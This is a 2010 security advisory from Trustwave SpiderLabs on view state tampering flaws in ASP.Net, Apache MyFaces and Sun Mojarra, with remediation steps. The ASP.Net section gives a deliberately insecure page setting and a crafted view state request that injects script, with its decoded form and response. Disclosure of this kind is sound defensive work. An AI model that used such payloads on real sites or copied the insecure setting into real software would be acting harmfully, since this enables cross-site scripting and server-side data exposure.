Trustwave's SpiderLabs Security Advisory TWSL2010-001:Multiplatform View State Tampering VulnerabilitiesPublished: 2010-02-08 Version: 1.1SpiderLabs has documented view state tamperingvulnerabilities in three products from separate vendors.View states are used by some web application frameworks tostore the state of HTML GUI controls. View states aretypically stored in hidden client-side input fields,although server-side storage is widely supported.The affected vendors generally recommend that client-sideview states are cryptographically signed and/or encrypted,but specific exploits have not been previously documented.These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affectedproducts.Credit: David Byrne of Trustwave's SpiderLabs===============================================Vendor: Microsoft (http://www.microsoft.com)Product: ASP.Net (http://www.asp.net)Versions affected: .Net 3.5 is confirmed vulnerable;previous versions are likely to be vulnerable as well.Description:ASP.Net is a web-application development framework thatprovides for both user interfaces, and back-endfunctionality.The ASP.Net view state is typically stored in a hidden fieldnamed "__VIEWSTATE". When a page's view state is notcryptographically signed, many standard .Net controls arevulnerable to Cross-Site Scripting (XSS) through the viewstate.It is well documented that using an unsigned view state is"bad", but most previous advisories focus on vaguelydescribed threats or vulnerabilities introduced by customuse of the view state. To the best of Trustwave's knowledge,this is the first time a proof of concept attack of thisnature has been demonstrated against the view state. Avulnerability was alluded to in a 2004 Microsoft article ontroubleshooting view state problems [1]. However, otherMicrosoft documents recommend disabling view state signing"if performance is a key consideration," [2, 3, 4] or forvarious other reasons [5, 6]. Realistically, unsigned viewstates should never be used in a production environment.The following code is vulnerable to a XSS attack against theform control. Note that the "ValidateRequest" setting doesnot prevent the attack. <%@ Page EnableViewStateMac="False" ValidateRequest="True" %> <html runat="server"> <form runat="server"/> </html>If the following request is sent to the server, the responsewill contain JavaScript that calls an alert box.xss.aspx?__VIEWSTATE=/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ%2BYWxlcnQoJ3hzcycpPC9zY3JpcHQ%2BZGQ=The view state's XML equivalent is below: <?xml version="1.0" encoding="utf-16"?> <viewstate> <Pair> <Pair> <String>-834067820</String> <Pair> <ArrayList> <Int32>0</Int32> <Pair> <ArrayList> <Int32>1</Int32> <Pair> <ArrayList><IndexedString>innerhtml</IndexedString><String><script>alert('xss')</script></String> </ArrayList> </Pair> </ArrayList> </Pair> </ArrayList> </Pair> </Pair> </Pair> </viewstate>The HTML response is below: <html> <form name="ctl01" method="post" action="xss.aspx" id="ctl01"> <div> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE"value="/wEPDwUKLTgzNDA2NzgyMA9kFgJmD2QWAgIBDxYCHglpbm5lcmh0bWwFHTxzY3JpcHQ+YWxlcnQoJ3hzcycpPC9zY3JpcHQ+ZGQ=" /> </div> <script>alert('xss')</script></form> </html>This example uses the "innerhtml" attribute of the formcontrol, although other attributes in other controls arealso vulnerable to similar attacks.Remediation Steps:The ASP.Net view state should always be cryptographicallysigned with a "Message Authentication Code" (MAC). This hasbeen enabled by default since .Net 1.1, but can be disabledusing the "EnableViewStateMac" setting. Using the"ViewStateUserKey" setting can also help to mitigate thescope of this vulnerability. [7]===============================================Vendor: Apache Software Foundation (http://www.apache.org)Product: Apache MyFaces (http://myfaces.apache.org/)Versions affected: 1.2.8 and 1.1.7 are confirmed as vulnerable. All previous versions are likely vulnerable.Related products: Some versions of IBM WebSphere Application Server (at least 6.x and 7.x) ship with Apache MyFaces [8,9]Description:MyFaces is an open source implementation of the JavaServerFaces standard. JavaServer Faces [10] is a framework thataids in developing user interfaces for web-basedapplications.When the application's view state is not encrypted, it ispossible for an attacker to supply a new or modified viewobject as part of a request. The malicious view can containarbitrary HTML code (allowing Cross-Site Scripting), andarbitrary Expression Language (EL) [11] statements that willbe executed on the server. The EL statements can be used toread data stored in user-scoped session variables, andapplication or server-scoped variables. Since thesevariables should be inaccessible by the user, it is notuncommon to store sensitive data in them.Exploiting this vulnerability requires modification of theserialized view object, which is not stored in a plaintextformat. The Deface tool[12] can be used to provideproof-of-concept attacks.Remediation Steps:This vulnerability can be completely prevented by encryptingthe application's view state.[13] This should always beperformed, even if this specific vulnerability is remediatedby Apache.===============================================Vendor: Sun Microsystems (http://www.sun.com)Product: Mojarra (https://javaserverfaces.dev.java.net/)Versions affected: 1.2_14 and 2.0.2 are confirmed as vulnerable. All previous versions are likely vulnerable.Related products: Some versions of IBM WebSphere Application Server (at least 6.x and 7.x) ship with Sun Mojarra [8,9] Although not well documented, some versions of Caucho Resin (at least 4.x) ship with Sun Mojarra [14]Description:Mojarra is the open source reference implementation of theJavaServer Faces standard. JavaServer Faces[10] is aframework that aids in developing user interfaces forweb-based applications.When the application's view state is not encrypted, it ispossible for an attacker to supply a new or modified viewobject as part of a request. The malicious view can containarbitrary HTML code (allowing Cross-Site Scripting), andarbitrary Expression Language (EL) [13] statements that willbe executed on the server. The EL statements can be used todisclose data stored in user-scoped session variables, andapplication or server-scoped variables. Since thesevariables are usually inaccessible by the user, it is notuncommon to store sensitive data in them.Exploiting this vulnerability requires modification of theserialized view object, which is not stored in a plain-textformat. Techniques similar to those used in the Defacetool[12] can provide proof-of-concept attacks.Remediation Steps:This vulnerability can be completely prevented by encryptingthe application's view state.[15] This should always beperformed, even if this specific vulnerability is remediatedby Sun.===============================================References1. http://support.microsoft.com/kb/8297432. http://msdn.microsoft.com/en-us/library/system.web.configuration.pagessection.enableviewstatemac.aspx3. http://msdn.microsoft.com/en-us/library/ydy4x04a.aspx4. http://msdn.microsoft.com/en-us/library/ms691344.aspx5. http://technet.microsoft.com/en-us/library/cc732610.aspx6. http://technet.microsoft.com/en-us/library/dd807062%28WS.10%29.aspx7. http://msdn.microsoft.com/en-us/library/ms178199(VS.85).aspx8. http://publib.boulder.ibm.com/infocenter/wasinfo/v6r1/topic/com.ibm.websphere.express.doc/info/exp/ae/cweb_javaserver_faces.html9. http://publib.boulder.ibm.com/infocenter/wasinfo/v7r0/topic/com.ibm.websphere.express.iseries.doc/info/iseriesexp/ae/cweb_javaserver_faces.html10. http://java.sun.com/javaee/javaserverfaces/11. http://java.sun.com/j2ee/1.4/docs/tutorial/doc/JSPIntro7.html12. https://www.trustwave.com/spiderLabs-tools.php13. http://wiki.apache.org/myfaces/Secure_Your_Application14. http://www.caucho.com/resin-javadoc/com/caucho/jsf/integration/Mojarra12InjectionProvider.html15. http://192.9.76.37/Wiki.jsp?page=JavaServerFacesRIRevision History:1.0 Initial publication (2010-02-03)1.1 Added information about IBM WebSphere and Caucho Resin (2010-02-08)About Trustwave:Trustwave is the leading provider of on-demand andsubscription-based information security and payment cardindustry compliance management solutions to businesses andgovernment entities throughout the world. For organizationsfaced with today's challenging data security and complianceenvironment, Trustwave provides a unique approach withcomprehensive solutions that include its flagshipTrustKeeper compliance management software and otherproprietary security solutions. Trustwave has helpedthousands of organizations--ranging from Fortune 500businesses and large financial institutions to small andmedium-sized retailers--manage compliance and secure theirnetwork infrastructure, data communications and criticalinformation assets. Trustwave is headquartered in Chicagowith offices throughout North America, South America,Europe, Africa, Asia and Australia. For more information,visit https://www.trustwave.comAbout Trustwave's SpiderLabs:SpiderLabs is the advance security team at Trustwaveresponsible for incident response and forensics, penetrationtesting, application security and security research for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabsDisclaimer:The information provided in this advisory is provided "asis" without warranty of any kind. Trustwave disclaims allwarranties, either express or implied, including thewarranties of merchantability and fitness for a particularpurpose. In no event shall Trustwave or its suppliers beliable for any damages whatsoever including direct,indirect, incidental, consequential, loss of businessprofits or special damages, even if Trustwave or itssuppliers have been advised of the possibility of suchdamages. Some states do not allow the exclusion orlimitation of liability for consequential or incidentaldamages so the foregoing limitation may not apply._______________________________________________Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
